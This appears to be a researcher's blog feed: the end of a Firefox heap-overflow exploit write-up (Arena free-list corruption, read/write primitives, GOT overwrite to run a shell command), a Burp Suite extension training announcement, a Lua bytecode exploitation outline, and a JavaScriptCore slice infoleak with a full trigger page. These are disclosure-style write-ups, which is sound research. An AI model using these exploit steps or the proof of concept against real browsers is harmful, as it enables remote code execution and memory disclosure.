    printf("chunk2: %p - %p\n", chunk2, chunk2 + MAP_SIZE);

    return 0;
}

The output of the above program tells us that we should be able to allocate something behind the overflowing buffer by simply mmap’ing memory until all existing holes are filled, then allocating one more memory chunk through mmap. To verify this we will do the following:

  1. Load a HTML document which includes a script (payload.js, which will trigger the overflow) and asynchronously executes some JavaScript code (code.js, which implements step 3 and 5)

  2. When the browser requests payload.js, have the server reply with a Content-Length of 0x100000001 but only send the first 0xffffffff bytes of the data

  3. Afterwards, let the JavaScript code allocate multiple large (1GB) ArrayBuffers (memory won’t necessarily be used until the buffers are actually written to)

  4. Have the webserver send the remaining two bytes of payload.js

  5. Check the first few bytes of every ArrayBuffer, one should contain the data sent by the webserver

To implement this, we will need some kind of synchronization primitive between the JavaScript code running in the browser and the webserver. For that reason I wrote a tiny webserver on top of python’s asyncio library which contains a handy Event object for synchronization accross coroutines. Creating two global events makes it possible to signal the server that the client-side code has finished its current task and is now waiting for the server to perform the next step. The handler for /sync looks as follows:

async def sync(request, response):
    script_ready_event.set()
    await server_done_event.wait()
    server_done_event.clear()

    response.send_header(200, {
        'Content-Type': 'text/plain; charset=utf-8',
        'Content-Length': '2'
    })

    response.write(b'OK')
    await response.drain()

On the client side, I used synchronous XMLHttpRequests to block script execution until the server has finished its part:

function synchronize() {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', location.origin + '/sync', false);
    // Server will block until the event has been fired
    xhr.send();
}

With that we can implement the above scenario and we will see that indeed one of the ArrayBuffer objects now contains our payload byte at the start of its buffer. There is one small limitation though: we can only overflow with valid UTF-16, as that is what Firefox uses internally. We’ll have to keep this in mind. What remains now is to find something more interesting to allocate instead of the ArrayBuffer that was overflown into.

Hunting for Target Objects

Since malloc (and thus the new operator in C++) will at some point request more memory using mmap, anything allocated with those could potentially be of interest for our exploit. I went a different route though. I initially wanted to check whether it would be possible to overflow into JavaScript objects and for example corrupt the length of an array or something similar. I thus started to dig around the JavaScript allocators to see where JSObjects are stored. Spidermonkey (the JavaScript engine inside Firefox) stores JSObjects in two separate regions:

  1. The tenured heap. Longer lived objects as well as a few selected object types are allocated here. This is a fairly classical heap that keeps track of free spots which it then reuses for future allocations.

  2. The Nursery. This is a memory region that contains short-lived objects. Most JSObjects are first allocated here, then moved into the tenured heap if they are still alive during the next GC cycle (this includes updating all pointers to them and thus requires that the gargabe collector knows about all pointers to its objects). The nursery requires no free list or similar: after a GC cycle the nursery is simply declared free since all alive objects have been moved out of it.

For a more in depth discussion of Spidermonkey internals see this phrack article.

Objects in the tenured heap are stored in containers called Arenas:

/*
 * Arenas are the allocation units of the tenured heap in the GC. An arena
 * is 4kiB in size and 4kiB-aligned. It starts with several header fields
 * followed by some bytes of padding. The remainder of the arena is filled
 * with GC things of a particular AllocKind. The padding ensures that the
 * GC thing array ends exactly at the end of the arena:
 *
 * <----------------------------------------------> = ArenaSize bytes
 * +---------------+---------+----+----+-----+----+
 * | header fields | padding | T0 | T1 | ... | Tn |
 * +---------------+---------+----+----+-----+----+
 * <-------------------------> = first thing offset
 */
class Arena
{
    static JS_FRIEND_DATA(const uint32_t) ThingSizes[];
    static JS_FRIEND_DATA(const uint32_t) FirstThingOffsets[];
    static JS_FRIEND_DATA(const uint32_t) ThingsPerArena[];

    /*
     * The first span of free things in the arena. Most of these spans are
     * stored as offsets in free regions of the data array, and most operations
     * on FreeSpans take an Arena pointer for safety. However, the FreeSpans
     * used for allocation are stored here, at the start of an Arena, and use
     * their own address to grab the next span within the same Arena.
     */
    FreeSpan firstFreeSpan;

    // ...

The comment already gives a fairly good summary: Arenas are simply container objects inside which JavaScript objects of the same size are allocated. They are located inside a container object, the Chunk structure, which is itself directly allocated through mmap. The interesting part is the firstFreeSpan member of the Arena class: it is the very first member of an Arena object (and thus lies at the beginning of an mmap-ed region), and essentially indicates the index of the first free cell inside this Arena. This is how a FreeSpan instance looks like:

class FreeSpan
{
    uint16_t first;
    uint16_t last;

    // methods following
}

Both first and last are byte indices into the Arena, indicating the head of the freelist. This opens up an interesting way to exploit this bug: by overflowing into the firstFreeSpan field of an Arena, we may be able to allocate an object inside another object, preferably inside some kind of accessible inline data. We would then be able to modify the “inner” object arbitrarily.

This technique has a few benefits:

  • Being able to allocate a JavaScript object at a chosen offset inside an Arena directly yields a memory read/write primitive as we shall see

  • We only need to overflow 4 bytes of the following chunk and thus won’t corrupt any pointers or other sensitive data

  • Arenas/Chunks can be allocated fairly reliably just by allocating large numbers of JavaScript objects

As it turns out, ArrayBuffer objects up to a size of 96 bytes will have their data stored inline after the object header. They will also skip the nursery and thus be located inside an Arena. This makes them ideal for our exploit. We will thus

  1. Allocate lots of ArrayBuffers with 96 bytes of storage

  2. Overflow and create a fake free cell inside the Arena following our buffer

  3. Allocate more ArrayBuffer objects of the same size and see if one of them is placed inside another ArrayBuffer’s data (just scan all “old” ArrayBuffers for non-zero content)

The Need for GC

Unfortunately, it’s not quite that easy: in order for Spidermonkey to allocate an object in our target (corrupted) Arena, the Arena must have previously been marked as (partially) free. This means that we need to free at least one slot in each Arena. We can do this by deleting every 25th ArrayBuffer (since there are 25 per Arena), then forcing garbage collection.

Spidermonkey triggers garbage collection for a variety of reasons. It seems the easiest one to trigger is TOO_MUCH_MALLOC: it is simply triggered whenever a certain number of bytes have been allocated through malloc. Thus, the following code suffices to trigger a garbage collection:

function gc() {
    const maxMallocBytes = 128 * MB;
    for (var i = 0; i < 3; i++) {
        var x = new ArrayBuffer(maxMallocBytes);
    }
}

Afterwards, our target arena will be put onto the free list and our subsequent overwrite will corrupt it. The next allocation from the corrupted arena will then return a (fake) cell inside the inline data of an ArrayBuffer object.

(Optional Reading) Compacting GC

Actually, it’s a little bit more complicated. There exists a GC mode called compacting GC, which will move objects from multiple partially filled arenas to fill holes in other arenas. This reduces internal fragmentation and helps freeing up entire Chunks so they can be returned to the OS. For us however, a compacting GC would be troublesome since it might fill the hole we created in our target arena. The following code is used to determine whether a compacting GC should be run:

bool
GCRuntime::shouldCompact()
{
    // Compact on shrinking GC if enabled, but skip compacting in incremental
    // GCs if we are currently animating.
    return invocationKind == GC_SHRINK && isCompactingGCEnabled() &&
        (!isIncremental || rt->lastAnimationTime + PRMJ_USEC_PER_SEC < PRMJ_Now());
}

Looking at the code there should be ways to prevent a compacting GC from happening (e.g. by performing some animations). It seems we are lucky though: our gc function from above will trigger the following code path in Spidermonkey, thus preventing a compacting GC since the invocationKind will be GC_NORMAL instead of GC_SHRINK.

bool
GCRuntime::gcIfRequested()
{
    // This method returns whether a major GC was performed.

    if (minorGCRequested())
        minorGC(minorGCTriggerReason);

    if (majorGCRequested()) {
        if (!isIncrementalGCInProgress())
            startGC(GC_NORMAL, majorGCTriggerReason);       // <-- we trigger this code path
        else
            gcSlice(majorGCTriggerReason);
        return true;
    }

    return false;
}

Writing an Exploit

At this point we have all the pieces together and can actually write an exploit. Once we have created the fake free cell and allocated an ArrayBuffer inside of it, we will see that one of the previously allocated ArrayBuffers now contains data. An ArrayBuffer object in Spidermonkey looks roughly as follows:

// From JSObject
GCPtrObjectGroup group_;

// From ShapedObject
GCPtrShape shape_;

// From NativeObject
HeapSlots* slots_;
HeapSlots* elements_;

// Slot offsets from ArrayBufferObject
static const uint8_t DATA_SLOT = 0;
static const uint8_t BYTE_LENGTH_SLOT = 1;
static const uint8_t FIRST_VIEW_SLOT = 2;
static const uint8_t FLAGS_SLOT = 3;

The XXX_SLOT constants determine the offset of the corresponding value from the start of the object. As such, the data pointer (DATA_SLOT) will be stored at addrof(ArrayBuffer) + sizeof(ArrayBuffer).

We can now construct the following exploit primitives:

  • Reading from an absolute memory address: we set the DATA_SLOT to the desired address and read from the inner ArrayBuffer

  • Writing to an absolute memory address: same as above, but this time we write to the inner ArrayBuffer

  • Leaking the address of a JavaScript Object: for that, we set the Object whose address we want to know as property of the inner ArrayBuffer, then read the address from the slots_ pointer through our existing read primitive

Process Continuation

To avoid crashing the browser process during the next GC cycle, we have to repair a few things:

  • The ArrayBuffer following the outer ArrayBuffer in our exploit, as that one will have been corrupted by the inner ArrayBuffer’s data. To fix this, We can simply copy another ArrayBuffer object into that location

  • The Cell that was originally freed in our Arena now looks like a used Cell and will be treated as such by the collector, leading to a crash since it has been overwritten with other data (e.g. a FreeSpan instance). We can fix this by restoring the original firstFreeSpan field of our Arena to mark that Cell as free again.

This suffices to keep the browser alive after the exploit finishes.

Summary

Putting everything together, the following steps will award us with an arbitrary read/write primitive:

  1. Insert a script tag to load the payload and eventually trigger the bug.

  2. Wait for the server to send up to 2GB + 1 bytes of data. The browser will now have allocated the final chunk that we will later overflow from. We try to fill the existing mmap holes using ArrayBuffer objects like we did for the very first PoC.

  3. Allocate JavaScript Arenas (memory regions) containing ArrayBuffers of size 96 (largest size so the data is still allocated inline behind the object) and hope one of them is placed right after the buffer we are about to overflow. Mmap allocates contiguous regions, so this can only fail if we don’t allocate enough memory or if something else is allocated there.

  4. Have the server send everything up to 0xffffffff bytes in total, completely filling the current chunk

  5. Free one ArrayBuffer in every arena and try to trigger gargabe collection so the arenas are inserted into the free list.

  6. Have the server send the remaining data. This will trigger the overflow and corrupt the internal free list (indicating which cells are unused) of one of the arenas. The freelist is modified such that the first free cell lies within the inline data of one of the ArrayBuffers contained in the Arena.

  7. Allocate more ArrayBuffers. If everything worked so far, one of them will be allocated inside the inline data of another ArrayBuffer. Search for that ArrayBuffer.

  8. If found, construct an arbitrary memory read/write primitive. We can now modify the data pointer of the inner ArrayBuffer, so this is quite easy.

  9. Repair the corrupted objects to keep the process alive after our exploit is finished.

Popping calc

What remains now is to somehow pop a calculator.

A simple way to run custom code is to abuse the JIT region, however, this technique is (partially) mitigated in Firefox. This can be bypassed given our exploitation primitives (e.g. by writing a small ROP chain and transferring control there), but this seemed to complicated for a simple PoC.

There are other Firefox-specific techniques to obtain code execution by abusing privileged JavaScript, but these require non-trivial modifications to the browser state (e.g. adding the turn_off_all_security_so_that_viruses_can_take_over_this_computer preference).

I instead ended up using some standard CTF tricks to finish the exploit: looking for cross references to libc functions that accept a string as first argument (in this case strcmp), I found the implementation of Date.toLocalFormat and noticed that it converts its first argument from a JSString to a C-string, which it then uses as first argument for strcmp. So we can simply replaced the GOT entry for strcmp with the address of system and execute data_obj.toLocaleFormat("open -a /Applications/Calculator.app");. Done :)

Improving the Exploit

At this point the basic exploit is already finished. This section will now describe how to make it more reliable and less bandwidth hungry.

Adding Robustness

Up until now our exploit simply allocated a few very large ArrayBuffer instances (1GB each) to fill existing mmap holes, then allocated roughly another GB of js::Arena instances to overflow into. It thus assumed that the browsers heap operations are more or less deterministic during exploitation. Since this isn’t necessarily the case, we’d like to make our exploit a little more robust.

A quick look at then implementation of the mozilla::Vector class (which is used to hold the script buffer) shows us that it uses realloc to double the size of its buffer when needed. Since jemalloc directly uses mmap for larger chunks, this leaves us with the following allocation pattern:

  • mmap 1MB
  • mmap 2MB, munmap previous chunk
  • mmap 4MB, munmap previous chunk
  • mmap 8MB, munmap previous chunk
  • mmap 8GB, munmap previous chunk

Because the current chunk size will always be larger than the sum of all previous chunks sizes, this will result in a lot of free space preceding our final buffer. In theory, we could simply calculate the total sum of the free space, then allocate a large ArrayBuffer afterwards. In practice, this doesn’t quite work since there will be other allocations after the server starts sending data and before the browser finishes decompressing the last chunk. Also jemalloc holds back a part of the freed memory for later usage. Instead we’ll try to allocate a chunk as soon as it is freed by the browser. Here’s what we’ll do:

  1. JavaScript code waits for the server using sync

  2. The server sends all data up to the next power of two (in MB) and thus triggers exactly one call to realloc at the end. The browser will now free a chunk of a known size

  3. The server sets the server_done_event, causing the JavaScript code to continue

  4. JavaScript code allocates an ArrayBuffer instance of the same size as the previous buffer, filling the free space

  5. This is repeated until we have send 0x80000001 bytes (thus forced the allocation of the final buffer)

This simple algorithm is implemented on the server side here and on the client in step 1. Using this algorithm, we can fairly reliably get an allocation behind our target buffer by spraying only a few megabytes of ArrayBuffer instances instead of multiple gigabytes.

Reducing Network Load

Our current exploit requires sending 4GB of data over the network. That’s easy to fix though: we’ll use HTTP compression. The nice part here is that e.g. zlip supports “streamed” compression, which makes it possible to incrementally compress the payload. With this we just have to add each part of the payload to the zlib stream, then call flush on it to obtain the next compressed chunk of the payload and send that to the server. The server will uncompress this chunk upon receiving it and perform the desired action (e.g. perform one realloc step).

This is implemented in the construct_payload method in poc.py and manages to reduce the size of the payload to about 18MB.

About Resource Usage

At least in theory, the exploit requires quite a lot of memory:

  • an 8GB buffer holding our “JavaScript” payload. Actually, it’s more like 12 GB, since during the final realloc, the content of a 4GB buffer must be copied to a new 8GB buffer

  • multiple (around 6GB) buffers allocated by JavaScript to fill the holes created by realloc

  • around 256 MB of ArrayBuffers

However, since many of the buffers are never written to, they don’t necessarily consume any physical memory. Moreover, during the final realloc, only 4GB of the new buffer will be written to before the old buffer is freed, so really “only” 8 GB are required there.

That’s still a lot of memory though. However, there are some technologies that will help reduce that number if physical memory becomes low:

  • Memory compression (macOS): large memory regions can be compressed and swapped out. This is perfect for our use case since the 8GB buffer will be completely filled with zeroes. This effect can be observed in the Activity Monitor.app, which at some point shows more than 6 GB of memory as “compressed” during the exploit.

  • Page deduplication (Windows, Linux): pages containing the same content are mapped copy-on-write (COW) and point to the same physical page (essentially reducing memory usage to 4KB).

CPU usage will also be quite high during peek times (decompression). However, CPU pressure could further be reduced by sending the payload in smaller chunks with delays in between (which would obviously increase the time it takes for the exploit to work though). This would also give the OS more time to compress and/or deduplicate the large memory buffers.

Further Possible Improvements

There are a few sources of unreliability in the current exploit, mostly dealing with timing:

  • During the sending of the payload data, if JavaScript runs the allocation before the browser has fully processed the next chunk, the allocations will “desyncronize”. This would likely lead to a failed exploit. Ideally, JavaScript would perform the allocation as soon as the next chunk has been received and processed. Which may be possible to determine by observing CPU usage.

  • If a garbage collection cycle runs after we have corrupted the FreeSpan but before we have fixed it, we crash

  • If a compacting gargabe collection cycle runs after we have freed some of the ArrayBuffers but before we have triggered the overflow, the exploit fails as the Arena will be filled up again.

  • If the fake free Cell happens to be placed inside the freed ArrayBuffer’s cell, then our exploit will fail and the browser will crash during the next gargabe collection cycle. With 25 cells per arena this gives us a theoretical 1/25 chance to fail. However, in my experiments, the free cells were always located at the same offset (1216 bytes into the Arena), indicating that the state of the engine at the beginning of the exploit is fairly deterministic (at least regarding the state of the Arenas holding objects of size 160 bytes).

From my experience, the exploit runs pretty reliable (>95%) if the browser is not under heavy usage. The exploit still works if 10+ other tabs are open, but might fail if for example a large web application is currently loading.

Conclusion

While the bug isn’t ideal from an attacker’s perspective, it still can be exploited fairly reliably and without too much bandwidth usage. It is interesting to see how various technologies (compression, same page merging, …) can make a bug such as this one easier to exploit.

Thinking of ways to prevent exploitability of such a bug, a few things come to mind. One fairly generic mitigation are guard pages (a page leading to a segfault whenever accessed in some way). These would have to be allocated before or after every mmap allocated region and would thus protect against exploitation of linear overflows such as this one. They would, however, not protect against non-linear overflows such as this bug. Another possibility would be to introduce internal mmap randomization to scatter the allocated regions throughout the address space (likely only effective on 64-bit systems). This would best be performed by the kernel, but could also be done in userspace.

Developing Burp Suite Extensions training

1 March 2017 at 23:00
We couldn't be more excited to present our brand-new class on web security and security automation. This blog post provides a quick overview of the 8-hours workshop.

Title

Developing Burp Suite Extensions - From manual testing to security automation.

Overview

Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. Traditional application security practices slow development and, in many cases, don’t address security at all. Instead, a new approach based on security automation and tactical security testing is needed to ensure important components are being tested before going live. Security professionals must master their tools to improve the efficiency of manual security testing as well as to deploy custom security automation solutions.

Based on this premise, we have created a brand-new class taking advantage of Burp Suite - the de-facto standard for web application security. In just eight hours, we show you how to use Burp Suite’s extension capabilities and unleash the power of the tool to improve efficiency and effectiveness during security audits.

After a quick intro to Burp and its extension APIs, we work on setting up an optimal development environment enabling fast coding and debugging. While we develop our code using Oracle’s Netbeans, we also provide templates for IntelliJ IDEA and Eclipse.

We will create many different types of plugins:

  • Extension #1: A custom logger to provide persistency and data export functionalities
  • Extension #2: A simple (and yet useful) replay tool
  • Extension #3: Active check for Burp’s scanning engine
  • Extension #4: Passive check for Burp’s scanning engine

Finally, we leverage our extensions to build a security automation toolchain integrated in a CI environment (Jenkins). This workshop is based on real-life use cases where the combination of custom checks and automation can help uncovering nasty security vulnerabilities.

All templates and code-complete Burp Suite extensions will be available for free on Doyensec’s Github. If you are curious, we’ve already uploaded the first three modules.

Audience

The training is suitable for both web application security specialists and developers. Attendees are expected to have rudimental understanding of Burp Suite as well as basic object-oriented programming experience (Burp extensions will be developed in Java).

Requirements

Attendees should bring their own laptop with the latest Java as well as their favourite IDE installed.

Upcoming dates

Location Date Notes
Heidelberg
(Germany)
March 21, 2017 Delivered during Troopers 2017 security conference. There are still seats available. Book it today and get Burp swag during the training!
Warsaw
(Poland)
June 5, 2017 Come for WarCon invite-only conference, stay for the training!
For registration, please contact [email protected] with subject line "Burp Training Post-WarCon".

Private training

This training is delivered worldwide (English language) during both public and private events. Considering that the class is hands-on, we are able to accept up to 15 attendees. Video recording available on request.

Feel free to contact us at [email protected] for scheduling your class!

Pwning Lua through 'load'

1 January 2017 at 00:00

In this post we’ll take a look at how to exploit the load function in Lua.

The Lua interpreter provides an interesting function to Lua code: load. It makes it possible to load (and subsequently execute) precompiled Lua bytecode at runtime (which one can obtain either through luac or by using string.dump on a function). This is interesting since not only does it require a parser for a binary format, but also allows execution of arbitrary bytecode. In fact, using afl to fuzz the bytecode loader will yield hundreds of crashes within a few minutes. Even the documentation explicitly warns about this function: Lua does not check the consistency of binary chunks. Maliciously crafted binary chunks can crash the interpreter.

Unsurprisingly, it turned out that malicious bytecode cannot just crash the interpreter, but also allows for native code execution within the interpreter process. This was the motivation for the “read-eval-pwn loop” CTF challenge of 33C3 CTF.

Let’s dig a bit deeper and find out what’s causing the interpreter to crash.

The Lua virtual machine is fairly simple, supporting only 47 different opcodes. The Lua interpreter uses a register-based virtual machine. As such many opcodes have register indices as operands. Other resources (e.g. constants) are also referenced by index. Take for example the implementation of the “LOADK” opcode, which is used to load a Lua value from a function’s constant table (to which the variable k points in the following code):

vmcase(OP_LOADK) {
    TValue *rb = k + GETARG_Bx(i);
    setobj2s(L, ra, rb);
    vmbreak;
}

We can see that there are no kinds of bounds checks. This is true for other opcodes as well (and also isn’t the only source of crashes). This is of course a known fact, but there also doesn’t seem to be a good solution for this (maybe apart from completely disabling load). See also this email to the Lua mailing list that I wrote some time ago and the replies, in particular this one.

Anyway, this looks like an interesting “feature” to write an exploit for.. ;)

Our plan will be to abuse the out-of-bounds indexing in the LOADK handler to inject custom objects into the virtual machine. The basic idea here is to allocate lots of strings containing fake Lua values through the constant table of the serialized function, hoping one would be placed behind the constants array itself during deserialization. Afterwards we use a the LOADK opcode with an out-of-bounds index to load a fake value in one of those strings.

Note that this approach has one drawback though: it relies on the heap layout since it indexes behind the heap chunk that holds the constants. This is a source of unreliability. It may be possible to avoid this by scanning (in the bytecode) for a particular value (e.g. a certain integer value) which marks the start of the fake values, but this is left as an exercise for the reader… ;)

At this point there is a very simple exploit in certain scenarios: assuming the Lua interpreter was modified such that e.g. os.execute was present in the binary but not available to Lua code (which happens if one just comments out this line in the source code), then we can simply create a fake function value that points to the native implementation and call it with whatever shell command we want to execute. If required, we can obtain the address of the interpreter code itself through tostring(load) (or any other native function for that matter):

> print(tostring(load))
"function: 0x41bcf0"

So what if we removed those functions entirely, and, to make it more interesting, also used clang’s control flow integrity on the binary so we couldn’t immediately gain RIP control through a fake function object? How can we exploit that?

Let’s start with an arbitrary read/write primitive:

  1. We’ll create a fake string object with its length set to 0x7fffffffffffffff, allowing us to leak memory behind the string object itself (unfortunately, Lua treats the index into the string as unsigned long, so reading before the string isn’t possible, but also not necessary)

  2. Since strings are immutable, we’ll also set up a fake table object (a combination of dict and list if you’re familiar with python), allowing us to write Lua values to anywhere in memory by setting the array pointer to the desired address

Next, we notice that the interpreter makes use of the setjmp mechanism to implement exceptions and yielding inside coroutines. The setjmp API is an easy way to bypass CFI protection since it directly loads various registers, including the instruction pointer, from a memory chunk.

To finish our exploit we will thus allocate coroutines until one of them is placed after our faked string. We can then leak the address of the jmpbuf structure, modify it from inside the coroutine and call yield, causing the interpreter to jump to an arbitrary address with fully controlled rsp register and a few others. A short ROP chain will do the rest.

Find the full exploit, together with all files necessary to reproduce the CTF challenge on my github.

JSC %TypedArray%.slice infoleak

19 September 2016 at 00:00

Just a very quick writeup of a bug I found in JavaScriptCore a few weeks ago. The code was at that time only shipping in the Safari Technology Preview and got fixed there with release 12.

The bug was located in TypedArrayView.prototype.slice when performing species construction. From JSGenericTypedArrayViewPrototypeFunctions.h:

template<typename ViewClass>
EncodedJSValue JSC_HOST_CALL genericTypedArrayViewProtoFuncSlice(ExecState* exec)
{

    // ...

    JSArrayBufferView* result = speciesConstruct(exec, thisObject, args, [&]() {
        Structure* structure = callee->globalObject()->typedArrayStructure(ViewClass::TypedArrayStorageType);
        return ViewClass::createUninitialized(exec, structure, length);
    });
    if (exec->hadException())
        return JSValue::encode(JSValue());

    // --1--

    // We return early here since we don't allocate a backing store if length is 0 and memmove does not like nullptrs
    if (!length)
        return JSValue::encode(result);

    // The species constructor may return an array with any arbitrary length.
    length = std::min(length, result->length());
    switch (result->classInfo()->typedArrayStorageType) {
    case TypeInt8:
        jsCast<JSInt8Array*>(result)->set(exec, 0, thisObject, begin, length, CopyType::LeftToRight);
        break;

    /* other cases */
    }

    return JSValue::encode(result);
}

At –1– there is no check if the thisObject’s buffer has been transferred (detached/neutered) while executing a species constructor. Also note that the default constructor (the lambda expression) creates an uninitialized array. It is possible to detach the array buffer during speciesConstruct while also invoking the default constructor, for example by setting up the target array as follows:

var a = new Uint8Array(N);
var c = new Function();
c.__defineGetter__(Symbol.species, function() { transferArrayBuffer(a.buffer); return undefined; });
a.constructor = c;

JSGenericTypedArrayView::set then does the following:

template<typename Adaptor>
bool JSGenericTypedArrayView<Adaptor>::set(
    ExecState* exec, unsigned offset, JSObject* object, unsigned objectOffset, unsigned length, CopyType type)
{
    const ClassInfo* ci = object->classInfo();
    if (ci->typedArrayStorageType == Adaptor::typeValue) {
        // The super fast case: we can just memcpy since we're the same type.
        JSGenericTypedArrayView* other = jsCast<JSGenericTypedArrayView*>(object);
        length = std::min(length, other->length());

        RELEASE_ASSERT(other->canAccessRangeQuickly(objectOffset, length));
        if (!validateRange(exec, offset, length))
            return false;

        memmove(typedVector() + offset, other->typedVector() + objectOffset, length * elementSize);
        return true;
    }

    // ...

here, other will be the original array which is detached by now. Its length will be zero and memmove becomes a nop. This results in an uninitialized array being returned to the caller, potentially leaking addresses and thus allowing for an ASLR bypass.

Here is a complete single-page application ;) to trigger the bug and dump the leaked data:

<!DOCTYPE html>
<html>
<head>
    <style>
    body {
      font-family: monospace;
    }
    </style>

    <script>
    if (typeof window !== 'undefined') {
        print = function(msg) {
            document.body.innerText += msg + '\n';
        }
    }

    function hex(b) {
        return ('0' + b.toString(16)).substr(-2);
    }

    function hexdump(data) {
        if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
            data = Array.from(data);

        var lines = [];
        for (var i = 0; i < data.length; i += 16) {
            var chunk = data.slice(i, i+16);
            var parts = chunk.map(hex);
            if (parts.length > 8)
                parts.splice(8, 0, ' ');
            lines.push(parts.join(' '));
        }

        return lines.join('\n');
    }

    function trigger() {
        var worker = new Worker('worker.js');

        function transferArrayBuffer(ab) {
          worker.postMessage([ab], [ab]);
        }

        var a = null;

        var c = function(){};
        c.__defineGetter__(Symbol.species, function() { transferArrayBuffer(a.buffer); return undefined; });

        for (var i = 0; i < 1000; i++) {
            // Prepare array object
            a = new Uint8Array(new ArrayBuffer(1024));
            a.constructor = c;
            // Trigger the bug
            var b = a.slice(0, 1024);
            // Check if b now contains nonzero values
            if (b.filter((e) => e != 0).length > 0) {
                print('leaked data:');
                print(hexdump(b));
                break;
            }
        }
    }
    </script>
</head>
<body onload="trigger()">
    <p>please wait...</p><br />
</body>
</html>

The original report will eventually be available here.

❌
❌